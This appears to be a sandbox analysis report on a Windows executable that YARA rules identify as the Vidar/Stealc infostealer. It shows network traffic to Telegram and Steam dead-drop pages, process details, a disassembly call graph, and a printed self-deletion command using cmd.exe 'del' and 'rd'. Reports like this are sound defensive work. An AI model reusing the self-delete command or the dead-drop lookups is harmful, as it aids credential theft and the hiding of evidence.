                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.749735149.154.167.994436420C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-12-16 09:45:11 UTC85OUTGET /asg7rd HTTP/1.1
                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        2024-12-16 09:45:11 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                        Date: Mon, 16 Dec 2024 09:45:11 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                        Content-Length: 9539
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=338d2b38f28578018d_12362536948919234430; expires=Tue, 17 Dec 2024 09:45:11 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                        2024-12-16 09:45:11 UTC9539INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 67 37 72 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asg7rd</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.749741104.102.49.2544436420C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-12-16 09:45:13 UTC119OUTGET /profiles/76561199794498376 HTTP/1.1
                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        2024-12-16 09:45:14 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Date: Mon, 16 Dec 2024 09:45:14 GMT
                                                                                                                                                                                                                                                        Content-Length: 35543
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Set-Cookie: sessionid=2a0ae2110795d9c095f145d0; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                        2024-12-16 09:45:14 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                        2024-12-16 09:45:14 UTC16384INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f
                                                                                                                                                                                                                                                        Data Ascii: " href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="https://steamcommunity.com/
                                                                                                                                                                                                                                                        2024-12-16 09:45:14 UTC3768INData Raw: 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 37 39 34 34 39 38 33 37 36 2f 62 61 64 67 65 73 22 3e
                                                                                                                                                                                                                                                        Data Ascii: info"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199794498376/badges">
                                                                                                                                                                                                                                                        2024-12-16 09:45:14 UTC924INData Raw: 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0a 09 09 09 09 09 09 09 26 6e 62 73 70 3b 20 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                        Data Ascii: 3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>&nbsp; | &nbsp;<a href="


                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                        Start time:04:44:45
                                                                                                                                                                                                                                                        Start date:16/12/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\njrtdhadawt.exe"
                                                                                                                                                                                                                                                        Imagebase:0xfe0000
                                                                                                                                                                                                                                                        File size:965'632 bytes
                                                                                                                                                                                                                                                        MD5 hash:96E4917EA5D59ECA7DD21AD7E7A03D07
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.1254479624.000000000100F000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                        Start time:06:11:53
                                                                                                                                                                                                                                                        Start date:16/12/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\AAKJKJDGCGDB" & exit
                                                                                                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                        Start time:06:11:53
                                                                                                                                                                                                                                                        Start date:16/12/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:06:11:53
                                                                                                                                                                                                                                                        Start date:16/12/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                                                                                        Imagebase:0x840000
                                                                                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:3.4%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                          Signature Coverage:3.9%
                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                          Total number of Limit Nodes:35
                                                                                                                                                                                                                                                          execution_graph 56931 ff7f0f 56932 ff7f16 56931->56932 56935 ffcab4 56932->56935 56934 ff7f2b 56936 ffcabe IsDebuggerPresent 56935->56936 56937 ffcabc 56935->56937 56943 ffd415 56936->56943 56937->56934 56940 ffcefe SetUnhandledExceptionFilter UnhandledExceptionFilter 56941 ffcf1b __call_reportfault 56940->56941 56942 ffcf23 GetCurrentProcess TerminateProcess 56940->56942 56941->56942 56942->56934 56943->56940 56944 6cd60d50 56945 6cd60d5e 56944->56945 56946 6cd60d59 56944->56946 56950 6cd60c1a 56945->56950 56961 6cd60e8d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 56946->56961 56951 6cd60c26 ___scrt_is_nonwritable_in_current_image 56950->56951 56952 6cd60c4f dllmain_raw 56951->56952 56956 6cd60c4a __DllMainCRTStartup@12 56951->56956 56958 6cd60c35 56951->56958 56953 6cd60c69 dllmain_crt_dispatch 56952->56953 56952->56958 56953->56956 56953->56958 56954 6cd60cbb 56955 6cd60cc4 dllmain_crt_dispatch 56954->56955 56954->56958 56957 6cd60cd7 dllmain_raw 56955->56957 56955->56958 56956->56954 56962 6cd60b6a 86 API calls 4 library calls 56956->56962 56957->56958 56960 6cd60cb0 dllmain_raw 56960->56954 56961->56945 56962->56960 56963 6cd60a10 56964 6cd60a4e 56963->56964 56965 6cd60a1b 56963->56965 56991 6cd60b6a 86 API calls 4 library calls 56964->56991 56966 6cd60a40 56965->56966 56967 6cd60a20 56965->56967 56975 6cd60a63 56966->56975 56969 6cd60a36 56967->56969 56971 6cd60a25 56967->56971 56990 6cd60fce 23 API calls 56969->56990 56974 6cd60a2a 56971->56974 56989 6cd60fed 21 API calls 56971->56989 56976 6cd60a6f ___scrt_is_nonwritable_in_current_image 56975->56976 56992 6cd6105e 56976->56992 56978 6cd60a76 __DllMainCRTStartup@12 56979 6cd60b62 56978->56979 56980 6cd60a9d 56978->56980 56986 6cd60ad9 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 56978->56986 57006 6cd611fd IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __InternalCxxFrameHandler 56979->57006 57003 6cd60fc0 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56980->57003 56983 6cd60b69 56984 6cd60aac __RTC_Initialize 56984->56986 57004 6cd60ede InitializeSListHead 56984->57004 56986->56974 56987 6cd60aba 56987->56986 57005 6cd60f95 IsProcessorFeaturePresent ___scrt_release_startup_lock 56987->57005 56989->56974 56990->56974 56991->56974 56993 6cd61067 56992->56993 57007 6cd613d6 IsProcessorFeaturePresent 56993->57007 56995 6cd61073 57008 6cd63bdd 10 API calls 2 library calls 56995->57008 56997 6cd61078 56998 6cd6107c 56997->56998 57009 6cd65f85 56997->57009 56998->56978 57001 6cd61093 57001->56978 57003->56984 57004->56987 57005->56986 57006->56983 57007->56995 57008->56997 57013 6cd68aad 57009->57013 57012 6cd63c0f 7 API calls 2 library calls 57012->56998 57014 6cd68abd 57013->57014 57015 6cd61085 57013->57015 57014->57015 57017 6cd68a21 57014->57017 57015->57001 57015->57012 57018 6cd68a2d ___scrt_is_nonwritable_in_current_image 57017->57018 57029 6cd669f8 EnterCriticalSection 57018->57029 57020 6cd68a34 57030 6cd6a5a4 57020->57030 57023 6cd68a52 57045 6cd68a78 LeaveCriticalSection __InternalCxxFrameHandler 57023->57045 57026 6cd68a63 57026->57014 57027 6cd68a4d 57044 6cd68971 GetStdHandle GetFileType 57027->57044 57029->57020 57031 6cd6a5b0 ___scrt_is_nonwritable_in_current_image 57030->57031 57032 6cd6a5da 57031->57032 57033 6cd6a5b9 57031->57033 57046 6cd669f8 EnterCriticalSection 57032->57046 57054 6cd66da9 14 API calls __dosmaperr 57033->57054 57036 6cd6a5be 57055 6cd66cc8 29 API calls ___std_exception_copy 57036->57055 57038 6cd68a43 57038->57023 57043 6cd688bb 32 API calls 57038->57043 57040 6cd6a5e6 57042 6cd6a612 57040->57042 57047 6cd6a4f4 57040->57047 57056 6cd6a639 LeaveCriticalSection __InternalCxxFrameHandler 57042->57056 57043->57027 57044->57023 57045->57026 57046->57040 57057 6cd66dbc 57047->57057 57049 6cd6a506 57053 6cd6a513 57049->57053 57064 6cd6877d 6 API calls __dosmaperr 57049->57064 57051 6cd6a568 57051->57040 57065 6cd66e19 14 API calls __dosmaperr 57053->57065 57054->57036 57055->57038 57056->57038 57062 6cd66dc9 __dosmaperr 57057->57062 57058 6cd66e09 57067 6cd66da9 14 API calls __dosmaperr 57058->57067 57059 6cd66df4 RtlAllocateHeap 57061 6cd66e07 57059->57061 57059->57062 57061->57049 57062->57058 57062->57059 57066 6cd68b55 EnterCriticalSection LeaveCriticalSection __dosmaperr 57062->57066 57064->57049 57065->57051 57066->57062 57067->57061 57068 ff7f30 57069 ff7f32 57068->57069 57119 fe2b58 57069->57119 57078 fe1274 25 API calls 57079 ff7f61 57078->57079 57080 fe1274 25 API calls 57079->57080 57081 ff7f6b 57080->57081 57234 fe147a GetPEB 57081->57234 57083 ff7f75 57084 fe1274 25 API calls 57083->57084 57085 ff7f7f 57084->57085 57086 fe1274 25 API calls 57085->57086 57087 ff7f89 57086->57087 57088 fe1274 25 API calls 57087->57088 57089 ff7f93 57088->57089 57235 fe1492 GetPEB 57089->57235 57091 ff7f9d 57092 fe1274 25 API calls 57091->57092 57093 ff7fa7 57092->57093 57094 fe1274 25 API calls 57093->57094 57095 ff7fb1 57094->57095 57096 fe1274 25 API calls 57095->57096 57097 ff7fbb 57096->57097 57236 fe14e9 57097->57236 57100 fe1274 25 API calls 57101 ff7fcf 57100->57101 57102 fe1274 25 API calls 57101->57102 57103 ff7fd9 57102->57103 57104 fe1274 25 API calls 57103->57104 57105 ff7fe3 57104->57105 57259 fe1656 GetTempPathW 57105->57259 57108 fe1274 25 API calls 57109 ff7ff2 57108->57109 57110 fe1274 25 API calls 57109->57110 57111 ff7ffc 57110->57111 57112 fe1274 25 API calls 57111->57112 57113 ff8006 57112->57113 57271 ff721e 57113->57271 57499 fe47d9 GetProcessHeap HeapAlloc 57119->57499 57122 fe47d9 3 API calls 57123 fe2b83 57122->57123 57124 fe47d9 3 API calls 57123->57124 57125 fe2b9c 57124->57125 57126 fe47d9 3 API calls 57125->57126 57127 fe2bb3 57126->57127 57128 fe47d9 3 API calls 57127->57128 57129 fe2bca 57128->57129 57130 fe47d9 3 API calls 57129->57130 57131 fe2be0 57130->57131 57132 fe47d9 3 API calls 57131->57132 57133 fe2bf7 57132->57133 57134 fe47d9 3 API calls 57133->57134 57135 fe2c0e 57134->57135 57136 fe47d9 3 API calls 57135->57136 57137 fe2c28 57136->57137 57138 fe47d9 3 API calls 57137->57138 57139 fe2c3f 57138->57139 57140 fe47d9 3 API calls 57139->57140 57141 fe2c56 57140->57141 57142 fe47d9 3 API calls 57141->57142 57143 fe2c6d 57142->57143 57144 fe47d9 3 API calls 57143->57144 57145 fe2c83 57144->57145 57146 fe47d9 3 API calls 57145->57146 57147 fe2c9a 57146->57147 57148 fe47d9 3 API calls 57147->57148 57149 fe2cb1 57148->57149 57150 fe47d9 3 API calls 57149->57150 57151 fe2cc8 57150->57151 57152 fe47d9 3 API calls 57151->57152 57153 fe2ce2 57152->57153 57154 fe47d9 3 API calls 57153->57154 57155 fe2cf9 57154->57155 57156 fe47d9 3 API calls 57155->57156 57157 fe2d10 57156->57157 57158 fe47d9 3 API calls 57157->57158 57159 fe2d27 57158->57159 57160 fe47d9 3 API calls 57159->57160 57161 fe2d3e 57160->57161 57162 fe47d9 3 API calls 57161->57162 57163 fe2d55 57162->57163 57164 fe47d9 3 API calls 57163->57164 57165 fe2d6c 57164->57165 57166 fe47d9 3 API calls 57165->57166 57167 fe2d82 57166->57167 57168 fe47d9 3 API calls 57167->57168 57169 fe2d9c 57168->57169 57170 fe47d9 3 API calls 57169->57170 57171 fe2db3 57170->57171 57172 fe47d9 3 API calls 57171->57172 57173 fe2dca 57172->57173 57174 fe47d9 3 API calls 57173->57174 57175 fe2de1 57174->57175 57176 fe47d9 3 API calls 57175->57176 57177 fe2df7 57176->57177 57178 fe47d9 3 API calls 57177->57178 57179 fe2e0e 57178->57179 57180 fe47d9 3 API calls 57179->57180 57181 fe2e25 57180->57181 57182 fe47d9 3 API calls 57181->57182 57183 fe2e3c 57182->57183 57184 fe47d9 3 API calls 57183->57184 57185 fe2e56 57184->57185 57186 fe47d9 3 API calls 57185->57186 57187 fe2e6d 57186->57187 57188 fe47d9 3 API calls 57187->57188 57189 fe2e84 57188->57189 57190 fe47d9 3 API calls 57189->57190 57191 fe2e9a 57190->57191 57192 fe47d9 3 API calls 57191->57192 57193 fe2eb1 57192->57193 57194 fe47d9 3 API calls 57193->57194 57195 fe2ec8 57194->57195 57196 fe47d9 3 API calls 57195->57196 57197 fe2edc 57196->57197 57198 fe47d9 3 API calls 57197->57198 57199 fe2ef3 57198->57199 57200 ff80c5 57199->57200 57503 ff801c GetPEB 57200->57503 57202 ff80cb 57203 ff80db 57202->57203 57204 ff82c6 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 57202->57204 57211 ff80f5 20 API calls 57203->57211 57205 ff8337 57204->57205 57206 ff8325 GetProcAddress 57204->57206 57207 ff8369 57205->57207 57208 ff8340 GetProcAddress GetProcAddress 57205->57208 57206->57205 57209 ff8384 57207->57209 57210 ff8372 GetProcAddress 57207->57210 57208->57207 57212 ff839f 57209->57212 57213 ff838d GetProcAddress 57209->57213 57210->57209 57211->57204 57214 ff83a8 GetProcAddress GetProcAddress 57212->57214 57215 ff7f43 57212->57215 57213->57212 57214->57215 57216 fe10e0 GetCurrentProcess VirtualAllocExNuma 57215->57216 57217 fe1088 VirtualAlloc 57216->57217 57218 fe1101 ExitProcess 57216->57218 57220 fe10a8 _memset 57217->57220 57221 fe10dc 57220->57221 57222 fe10c5 VirtualFree 57220->57222 57223 fe1274 57221->57223 57222->57221 57224 fe129c _memset 57223->57224 57225 fe12ab 13 API calls 57224->57225 57504 ff0ea8 GetProcessHeap HeapAlloc GetComputerNameA 57225->57504 57228 fe13d9 57229 ffcab4 ___init_ctype 5 API calls 57228->57229 57231 fe13e4 57229->57231 57231->57078 57232 fe13a9 57232->57228 57233 fe13d2 ExitProcess 57232->57233 57234->57083 57235->57091 57507 fe149d GetPEB 57236->57507 57239 fe149d 2 API calls 57240 fe1506 57239->57240 57241 fe149d 2 API calls 57240->57241 57258 fe1591 57240->57258 57242 fe1519 57241->57242 57243 fe149d 2 API calls 57242->57243 57242->57258 57244 fe1528 57243->57244 57245 fe149d 2 API calls 57244->57245 57244->57258 57246 fe1537 57245->57246 57247 fe149d 2 API calls 57246->57247 57246->57258 57248 fe1546 57247->57248 57249 fe149d 2 API calls 57248->57249 57248->57258 57250 fe1555 57249->57250 57251 fe149d 2 API calls 57250->57251 57250->57258 57252 fe1564 57251->57252 57253 fe149d 2 API calls 57252->57253 57252->57258 57254 fe1573 57253->57254 57255 fe149d 2 API calls 57254->57255 57254->57258 57256 fe1582 57255->57256 57257 fe149d 2 API calls 57256->57257 57256->57258 57257->57258 57258->57100 57260 fe1694 wsprintfW 57259->57260 57261 fe17e7 57259->57261 57262 fe16c0 CreateFileW 57260->57262 57263 ffcab4 ___init_ctype 5 API calls 57261->57263 57262->57261 57264 fe16eb GetProcessHeap RtlAllocateHeap _time64 srand rand 57262->57264 57265 fe17f7 57263->57265 57269 fe1744 _memset 57264->57269 57265->57108 57266 fe1723 WriteFile 57266->57261 57266->57269 57267 fe1758 CloseHandle CreateFileW 57267->57261 57268 fe178e ReadFile 57267->57268 57268->57261 57268->57269 57269->57261 57269->57266 57269->57267 57270 fe17b3 GetProcessHeap RtlFreeHeap CloseHandle 57269->57270 57270->57261 57270->57262 57272 ff722e 57271->57272 57511 ff070a 57272->57511 57276 ff7252 57516 ff082c lstrlenA 57276->57516 57279 ff082c 3 API calls 57280 ff7274 57279->57280 57281 ff082c 3 API calls 57280->57281 57282 ff727d 57281->57282 57520 ff07b0 57282->57520 57284 ff7286 57285 ff72b1 OpenEventA 57284->57285 57286 ff72aa CloseHandle 57285->57286 57287 ff72c1 CreateEventA 57285->57287 57286->57285 57288 ff070a lstrcpyA 57287->57288 57289 ff72e6 57288->57289 57524 ff076c lstrlenA 57289->57524 57292 ff076c 2 API calls 57293 ff734d 57292->57293 57528 fe2f03 57293->57528 57296 ff83d2 121 API calls 57297 ff7480 57296->57297 58083 ff1e6d 57297->58083 57300 ff07b0 